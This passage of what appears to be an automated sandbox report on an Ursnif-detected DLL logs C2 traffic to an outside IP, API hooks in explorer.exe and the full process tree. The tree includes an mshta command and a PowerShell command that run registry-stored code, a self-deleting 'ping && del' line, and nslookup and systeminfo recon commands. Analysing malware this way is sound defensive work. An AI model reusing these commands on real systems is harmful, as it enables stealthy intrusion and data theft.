03 f5 51 e0 b9 01 97 cc 43 ab 9c 64 8f 0d 59 27 f3 4b 68 35 08 89 8b 40 e9 64 aa 92 d9 fc c8 62 7d b8 2c a0 d3 9b ee a8 42 c2 4d c4 68 17 66 1c 27 e3 e4 bc e3 1e 3a 89 0d 0a 2d 2d 31 30 32 33 37 35 37 31 32 34 32 36 34 30 30 38 30 30 30 34 31 39 32 35 39 31 35 38 33 2d 2d 0d 0a Data Ascii: --10237571242640080004192591583Content-Disposition: form-data; name="upload_file"; filename="7BC3.bin"Bme `=JS2?F*9Q0o%5+4?pn,i;<1W-Y%eiuA:pLF8KFUgDDib\u5<8Kk]&HhNjEr/8QCdY'Kh5@db},BMhf':--10237571242640080004192591583--
Apr 22, 2022 16:17:56.469044924 CEST	9735	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:17:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 22, 2022 16:17:57.449640989 CEST	9736	OUT	POST /images/fWI73R1_2Fi/dMEh0cq63rRCJy/hEJHCisV7TLXf6s5qDp3z/BCtN_2Bg1My_2Bxo/AhaNT6s6q6_2B58/OQZoTj4FY38JIpdz1z/MCQ_2Fvl2/KaObwwaShYciWGHB8igT/ebmAGB0PycjKyjC2pvQ/6aj0R0O7yrH6fMGLiN7rcC/6qFHr8cars3Gw/I8BuhPaS/BZ6BhWd8QiKaDrJK4XQp4Ag/g0wwOGo1XO/QfQATDgE2jY4Wf7L8/foVbicjFFFm0/9oroSq36Cxf/G6HPMi1wZ9ycu5/gwcS_2Bt/rdAx9WRg/N.bmp HTTP/1.1 Content-Type: multipart/form-data; boundary=8643821742640080004208529078 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 67.43.234.14 Content-Length: 559 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:17:57.449678898 CEST	9737	OUT	Data Raw: 2d 2d 38 36 34 33 38 32 31 37 34 32 36 34 30 30 38 30 30 30 34 32 30 38 35 32 39 30 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 Data Ascii: --8643821742640080004208529078Content-Disposition: form-data; name="upload_file"; filename="FFD3.bin"1LeBB57Q8X!0:R Sz+:@Nn&Tx O2(}3:>(ELnfP*5w"[%A.jg]^lu
Apr 22, 2022 16:17:58.082153082 CEST	9737	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:17:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49848	67.43.234.37	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 22, 2022 16:18:43.523910046 CEST	9743	OUT	GET /images/hn9vDo5o2pdwMOj3di2/srMWN78hgDZUaczxPO5xxx/2O_2BS3ntQAQz/HnUcb3IT/8KnpgLjtplHN_2BEPqSF8QZ/cHtm5lTJOq/oTLlrsZ_2FnSt3L1j/Pc8IkXGbvady/p2WZlb867S8/9A0MeJ_2Bf5dgM/Eq4tZ0kF_2BtpXCObDeNb/z7e3J6dr_2FplJ56/bsJlbMROD_2Bomk/PfAQY77jeEzZAgeRyz/ayGbSxTMe/2FEuvtf4avwFHn_2BWAf/pOJpt5b_2FsOQqxnM7m/jDA3Wj8oGk9rEw_2Buu3H7/S72EfErm/f.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 67.43.234.37 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:18:44.161041021 CEST	9744	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:18:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFF3FC1521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFF3FC15200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFF3FC1520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFF3FC15200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5669B18

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFF3FC15200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5669B18

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 408, Parent PID: 4688

General

Target ID:	2
Start time:	16:14:48
Start date:	22/04/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll"
Imagebase:	0x1180000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exePID: 2220, Parent PID: 408

General

Target ID:	3
Start time:	16:14:49
Start date:	22/04/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll",#1
Imagebase:	0xed0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exePID: 2588, Parent PID: 2220

General

Target ID:	4
Start time:	16:14:50
Start date:	22/04/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll",#1
Imagebase:	0x1300000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.436099354.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.387911041.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.387848554.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.564167327.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.387690686.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.388080339.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.388156099.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.569771687.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.436035470.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.387614709.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.433046999.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.388142124.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438809080.000000000542C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.572421841.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.387950801.0000000005628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.435816444.000000000552A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exePID: 4500, Parent PID: 408

General

Target ID:	7
Start time:	16:14:52
Start date:	22/04/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 604
Imagebase:	0xc00000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exePID: 6724, Parent PID: 408

General

Target ID:	9
Start time:	16:14:57
Start date:	22/04/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 612
Imagebase:	0xc00000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exePID: 6568, Parent PID: 408

General

Target ID:	12
Start time:	16:15:06
Start date:	22/04/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 640
Imagebase:	0xc00000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exePID: 6876, Parent PID: 3688

General

Target ID:	18
Start time:	16:15:29
Start date:	22/04/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qq47='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qq47).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Imagebase:	0x7ff62e710000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000012.00000003.457911317.0000023DBE700000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: powershell.exePID: 6856, Parent PID: 6876

General

Target ID:	19
Start time:	16:15:31
Start date:	22/04/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ffrhac -value gp; new-alias -name ulgwgd -value iex; ulgwgd ([System.Text.Encoding]::ASCII.GetString((ffrhac "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Imagebase:	0x7ff620040000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000002.686963959.0000019853F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exePID: 3272, Parent PID: 6856

General

Target ID:	20
Start time:	16:15:32
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exePID: 2312, Parent PID: 6856

General

Target ID:	22
Start time:	16:15:40
Start date:	22/04/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.cmdline
Imagebase:	0x7ff7a74c0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exePID: 3284, Parent PID: 2312

General

Target ID:	23
Start time:	16:15:45
Start date:	22/04/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5B2D.tmp" "c:\Users\user\AppData\Local\Temp\vqkyohgm\CSCBF795D6899604BF9A48E638AB671C4FD.TMP"
Imagebase:	0x7ff793530000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exePID: 6296, Parent PID: 6856

General

Target ID:	25
Start time:	16:15:49
Start date:	22/04/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.cmdline
Imagebase:	0x7ff7a74c0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: control.exePID: 6468, Parent PID: 2588

General

Target ID:	26
Start time:	16:15:50
Start date:	22/04/2022
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff76ad30000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001A.00000000.507197742.0000000000930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001A.00000000.504046961.0000000000930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001A.00000000.505634538.0000000000930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cvtres.exePID: 6448, Parent PID: 6296

General

Target ID:	27
Start time:	16:15:50
Start date:	22/04/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Users\user\AppData\Local\Temp\g2letrfe\CSC71DE0290BB9F401583CAD01729BF75D7.TMP"
Imagebase:	0x7ff793530000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exePID: 3688, Parent PID: 6856

General

Target ID:	29
Start time:	16:15:59
Start date:	22/04/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff77c400000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: BackgroundTransferHost.exePID: 60, Parent PID: 812

General

Target ID:	33
Start time:	16:16:12
Start date:	22/04/2022
Path:	C:\Windows\System32\BackgroundTransferHost.exe
Wow64 process (32bit):	false
Commandline:	"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Imagebase:	0x7ff638f20000
File size:	36864 bytes
MD5 hash:	02BA81746B929ECC9DB6665589B68335
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5576, Parent PID: 3688

General

Target ID:	35
Start time:	16:16:17
Start date:	22/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\d6YCUW421p.dll
Imagebase:	0x7ff6edbd0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exePID: 3252, Parent PID: 5576

General

Target ID:	37
Start time:	16:16:22
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXEPID: 6340, Parent PID: 5576

General

Target ID:	38
Start time:	16:16:23
Start date:	22/04/2022
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff705af0000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exePID: 4504, Parent PID: 3688

General

Target ID:	39
Start time:	16:16:36
Start date:	22/04/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff61beb0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000027.00000000.622907247.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000027.00000000.619033467.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000027.00000000.615194902.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exePID: 3932, Parent PID: 6468

General

Target ID:	40
Start time:	16:16:36
Start date:	22/04/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff60bdc0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000028.00000000.604999946.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000028.00000000.603233146.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000028.00000000.606133763.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exePID: 3756, Parent PID: 3688

General

Target ID:	41
Start time:	16:16:44
Start date:	22/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6B3A.bi1"
Imagebase:	0x7ff6edbd0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exePID: 876, Parent PID: 3756

General

Target ID:	42
Start time:	16:16:46
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: nslookup.exePID: 1212, Parent PID: 3756

General

Target ID:	43
Start time:	16:16:46
Start date:	22/04/2022
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup myip.opendns.com resolver1.opendns.com
Imagebase:	0x7ff757cc0000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 504, Parent PID: 3688

General

Target ID:	44
Start time:	16:16:49
Start date:	22/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6B3A.bi1"
Imagebase:	0x7ff6edbd0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exePID: 5804, Parent PID: 504

General

Target ID:	45
Start time:	16:16:52
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exePID: 4712, Parent PID: 3688

General

Target ID:	46
Start time:	16:16:52
Start date:	22/04/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff61beb0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002E.00000000.667078163.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002E.00000000.654783377.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002E.00000000.661830136.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exePID: 5116, Parent PID: 3688

General

Target ID:	47
Start time:	16:17:01
Start date:	22/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Imagebase:	0x7ff6edbd0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exePID: 6932, Parent PID: 5116

General

Target ID:	48
Start time:	16:17:04
Start date:	22/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0xbc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exePID: 5020, Parent PID: 3688

General

Target ID:	49
Start time:	16:17:07
Start date:	22/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Imagebase:	0x7ff6edbd0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exePID: 2880, Parent PID: 3688

General

Target ID:	50
Start time:	16:17:13
Start date:	22/04/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff61beb0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
